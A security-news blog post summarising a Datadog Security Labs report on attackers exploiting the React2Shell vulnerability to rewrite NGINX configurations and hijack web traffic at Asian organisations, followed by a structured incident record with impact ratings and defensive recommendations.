• Home
  • cyber
  • NGINX and Boato Panel: Threat actors hijack web traffic after exploiting React2Shell vulnerability: Report
cyber Vulnerability

NGINX and Boato Panel: Threat actors hijack web traffic after exploiting React2Shell vulnerability: Report

Jan 1, 2026 3 min read
NGINX and Boato Panel: Threat actors hijack web traffic after exploiting React2Shell vulnerability: Report

Threat Actors Exploit React2Shell Vulnerability to Hijack NGINX Web Traffic

Researchers at Datadog Security Labs have uncovered a multi-stage, automated campaign where threat actors exploit the React2Shell vulnerability to compromise NGINX web servers, redirecting traffic for malicious purposes. The attacks primarily target organizations in Asia particularly those with domains ending in .in, .id, .pe, .bd, .edu, .gov, and .th as well as Chinese hosting infrastructure, often running Boato Panel for server management.

Once inside a network, attackers deploy toolkits containing scripts for target discovery, persistence, and malicious configuration file creation. These files manipulate NGINX’s routing rules to hijack web traffic, enabling activities such as:

  • Fingerprinting organizational traffic
  • Injecting malware into users’ devices
  • Redirecting visitors to phishing pages to steal credentials

The shift toward NGINX exploitation reflects a broader trend: as defenses like MFA and password managers strengthen, attackers are reverting to infrastructure-level attacks such as session cookie theft to bypass modern security controls. Notably, two IP addresses now account for 56% of observed exploitation attempts, a sharp consolidation from over 1,000 unique sources earlier.

Defensive measures highlighted by researchers include:

  • Monitoring NGINX configuration file integrity to detect unauthorized changes
  • Applying the latest security patches, particularly for React and NGINX
  • Locking down configuration files to prevent tampering

The attacks underscore the risks of unpatched vulnerabilities and poorly secured web infrastructure, with compromised sites facing reputational damage if flagged for hosting malware. The use of AI-driven exploitation tools further lowers the barrier for attackers, making server-side vulnerabilities a fast and cost-effective target.

Source: https://www.csoonline.com/article/4127554/threat-actors-hijack-web-traffic-after-exploiting-react2shell-vulnerability-report.html

boatoon GmbH cybersecurity rating report: https://www.rankiteo.com/company/boatoon-gmbh

NGINX cybersecurity rating report: https://www.rankiteo.com/company/nginx

"id": "BOANGI1770244421",
"linkid": "boatoon-gmbh, nginx",
"type": "Vulnerability",
"date": "1/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"
{'affected_entities': [{'location': 'Asia (domains ending in .in, .id, .pe, '
                                    '.bd, .edu, .gov, .th), Chinese hosting '
                                    'infrastructure',
                        'type': 'Organizations'}],
 'attack_vector': 'Exploitation of React2Shell vulnerability',
 'data_breach': {'personally_identifiable_information': 'Yes',
                 'sensitivity_of_data': 'High (personally identifiable '
                                        'information)',
                 'type_of_data_compromised': 'Credentials (via phishing)'},
 'description': 'Researchers at Datadog Security Labs have uncovered a '
                'multi-stage, automated campaign where threat actors exploit '
                'the React2Shell vulnerability to compromise NGINX web '
                'servers, redirecting traffic for malicious purposes. The '
                'attacks primarily target organizations in Asia, particularly '
                'those with domains ending in .in, .id, .pe, .bd, .edu, .gov, '
                'and .th, as well as Chinese hosting infrastructure, often '
                'running Boato Panel for server management. Attackers deploy '
                'toolkits containing scripts for target discovery, '
                'persistence, and malicious configuration file creation to '
                'manipulate NGINX’s routing rules, enabling activities such as '
                'fingerprinting organizational traffic, injecting malware, and '
                'redirecting visitors to phishing pages to steal credentials.',
 'impact': {'brand_reputation_impact': 'Reputational damage if flagged for '
                                       'hosting malware',
            'identity_theft_risk': 'High (credential theft via phishing)',
            'operational_impact': 'Traffic hijacking, malware injection, '
                                  'phishing redirection',
            'systems_affected': 'NGINX web servers'},
 'initial_access_broker': {'entry_point': 'React2Shell vulnerability'},
 'lessons_learned': 'The incident underscores the risks of unpatched '
                    'vulnerabilities and poorly secured web infrastructure. '
                    'Attackers are increasingly targeting server-side '
                    'vulnerabilities to bypass modern security controls like '
                    'MFA and password managers.',
 'motivation': ['Credential theft',
                'Malware distribution',
                'Traffic redirection'],
 'post_incident_analysis': {'corrective_actions': ['Patch management',
                                                   'Configuration file '
                                                   'integrity monitoring',
                                                   'Access control for NGINX '
                                                   'configurations'],
                            'root_causes': ['Unpatched React2Shell '
                                            'vulnerability',
                                            'Poorly secured NGINX '
                                            'configuration files']},
 'recommendations': ['Monitor NGINX configuration file integrity to detect '
                     'unauthorized changes',
                     'Apply the latest security patches, particularly for '
                     'React and NGINX',
                     'Lock down configuration files to prevent tampering',
                     'Implement enhanced monitoring for infrastructure-level '
                     'attacks'],
 'references': [{'source': 'Datadog Security Labs'}],
 'response': {'remediation_measures': ['Monitoring NGINX configuration file '
                                       'integrity',
                                       'Applying the latest security patches '
                                       'for React and NGINX',
                                       'Locking down configuration files to '
                                       'prevent tampering'],
              'third_party_assistance': 'Datadog Security Labs'},
 'title': 'Threat Actors Exploit React2Shell Vulnerability to Hijack NGINX Web '
          'Traffic',
 'type': 'Web Traffic Hijacking',
 'vulnerability_exploited': 'React2Shell'}
Published by
Jeremy C
Jeremy C
You might also like
Great! Next, complete checkout for full access to Rankiteo Blog.
Welcome back! You've successfully signed in.
You've successfully subscribed to Rankiteo Blog.
Success! Your account is fully activated, you now have access to all content.
Success! Your billing info has been updated.
Your billing was not updated.